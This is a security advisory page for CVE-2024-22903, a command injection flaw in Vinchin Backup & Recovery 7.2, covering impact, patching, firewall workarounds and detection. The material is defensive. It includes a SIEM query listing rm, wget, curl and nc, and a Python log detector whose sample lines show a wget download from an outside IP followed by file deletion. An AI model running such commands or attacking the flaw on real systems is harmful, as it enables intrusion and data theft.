CVE-2024-22903
📋 TL;DR
Vinchin Backup & Recovery v7.2 contains an authenticated remote code execution vulnerability in the deleteUpdateAPK function. This allows authenticated attackers to execute arbitrary commands on the server. Organizations using Vinchin Backup & Recovery v7.2 are affected.
💻 Affected Systems
- Vinchin Backup & Recovery
📦 What is this software?
⚠️ Risk & Real-World Impact
Worst Case
Complete system compromise allowing attackers to execute arbitrary commands, steal data, deploy ransomware, or pivot to other systems in the network.
Likely Case
Attackers with valid credentials can execute commands to exfiltrate backup data, install malware, or create persistent access.
If Mitigated
With proper network segmentation and least privilege access, impact could be limited to the backup system itself.
🎯 Exploit Status
Exploit code is publicly available and requires only authenticated access. The vulnerability is actively being exploited.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: v7.2 Hotfix or later
Vendor Advisory: http://vinchin.com
Restart Required: Yes
Instructions:
1. Download the latest patch from the Vinchin official website.
2. Back up the current configuration.
3. Apply the patch following the vendor's instructions.
4. Restart the Vinchin Backup & Recovery service.
🔧 Temporary Workarounds
Restrict Access
Limit network access to the Vinchin Backup & Recovery management interface to trusted IPs only:
iptables -A INPUT -p tcp --dport [Vinchin_port] -s [trusted_IP] -j ACCEPT
iptables -A INPUT -p tcp --dport [Vinchin_port] -j DROP
Disable Unused Functions
If the update functionality is not needed, disable the update service component:
systemctl stop vinchin-update
systemctl disable vinchin-update
🧯 If You Can't Patch
- Isolate the Vinchin Backup & Recovery system in a separate network segment with strict firewall rules.
- Implement multi-factor authentication and strong password policies for all Vinchin administrative accounts.
🔍 How to Verify
Check if Vulnerable:
Check if Vinchin Backup & Recovery version is 7.2. Look for the vulnerable deleteUpdateAPK function in SystemHandler.class.php.
Check Version:
Check the Vinchin web interface admin panel, or run:
cat /usr/local/vinchin/version.txt
Verify Fix Applied:
Verify the patch has been applied by checking the version is updated to v7.2 Hotfix or later. Test the deleteUpdateAPK function with safe payloads.
📡 Detection & Monitoring
Log Indicators:
- Unusual commands executed via Vinchin web interface
- Multiple failed authentication attempts followed by successful login
- Suspicious file operations in Vinchin directories
Network Indicators:
- Unusual outbound connections from Vinchin server
- Traffic to known malicious IPs from Vinchin system
SIEM Query:
source="vinchin.log" AND (command="rm" OR command="wget" OR command="curl" OR command="nc")
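An added example, not part of the advisory or of any Vinchin tooling, that applies the two log indicators above to constructed log lines: the command list from the SIEM query, and the "multiple failed logins followed by a success" pattern. The key=value log format, field names and sample values are assumptions, since the page does not document the real Vinchin log format.

```python
import re
from collections import defaultdict

# Constructed sample log lines in an assumed key=value format (not the real Vinchin format).
SAMPLE_LOG = """\
ts=2024-01-15T10:00:01Z src=10.0.0.5 event=login user=admin result=fail
ts=2024-01-15T10:00:03Z src=10.0.0.5 event=login user=admin result=fail
ts=2024-01-15T10:00:05Z src=10.0.0.5 event=login user=admin result=fail
ts=2024-01-15T10:00:09Z src=10.0.0.5 event=login user=admin result=success
ts=2024-01-15T10:01:00Z src=10.0.0.5 event=exec user=admin command="wget http://203.0.113.9/x"
ts=2024-01-15T10:01:02Z src=10.0.0.5 event=exec user=admin command="rm -f /tmp/x"
ts=2024-01-15T10:05:00Z src=10.0.0.7 event=login user=backup result=success
ts=2024-01-15T10:05:30Z src=10.0.0.7 event=exec user=backup command="ls /backup"
"""

# Command indicators taken from the SIEM query in the advisory.
SUSPICIOUS_COMMANDS = {"rm", "wget", "curl", "nc"}
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

def parse_line(line):
    """Parse one key=value log line into a dict, stripping surrounding quotes."""
    return {k: v.strip('"') for k, v in FIELD_RE.findall(line)}

def suspicious_commands(lines):
    """Return (src, user, command) for exec events whose program is an indicator."""
    hits = []
    for rec in map(parse_line, lines):
        if rec.get("event") != "exec":
            continue
        cmd = rec.get("command", "")
        if cmd.split(" ", 1)[0] in SUSPICIOUS_COMMANDS:
            hits.append((rec["src"], rec["user"], cmd))
    return hits

def brute_force_then_success(lines, threshold=3):
    """Return sources with >= threshold consecutive failed logins followed by a success."""
    streak = defaultdict(int)  # consecutive failures per source address
    flagged = []
    for rec in map(parse_line, lines):
        if rec.get("event") != "login":
            continue
        src = rec["src"]
        if rec["result"] == "fail":
            streak[src] += 1
        else:
            if streak[src] >= threshold:
                flagged.append(src)
            streak[src] = 0  # a success resets the failure streak
    return flagged
```

On the constructed sample, the first function reports the wget and rm executions from 10.0.0.5 and the second flags the same source for three failures followed by a successful login.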
🔗 References
- http://vinchin.com
- https://blog.leakix.net/2024/01/vinchin-backup-rce-chain/
- https://seclists.org/fulldisclosure/2024/Jan/32
- http://packetstormsecurity.com/files/176796/Vinchin-Backup-And-Recovery-7.2-SystemHandler.class.php-Command-Injection.html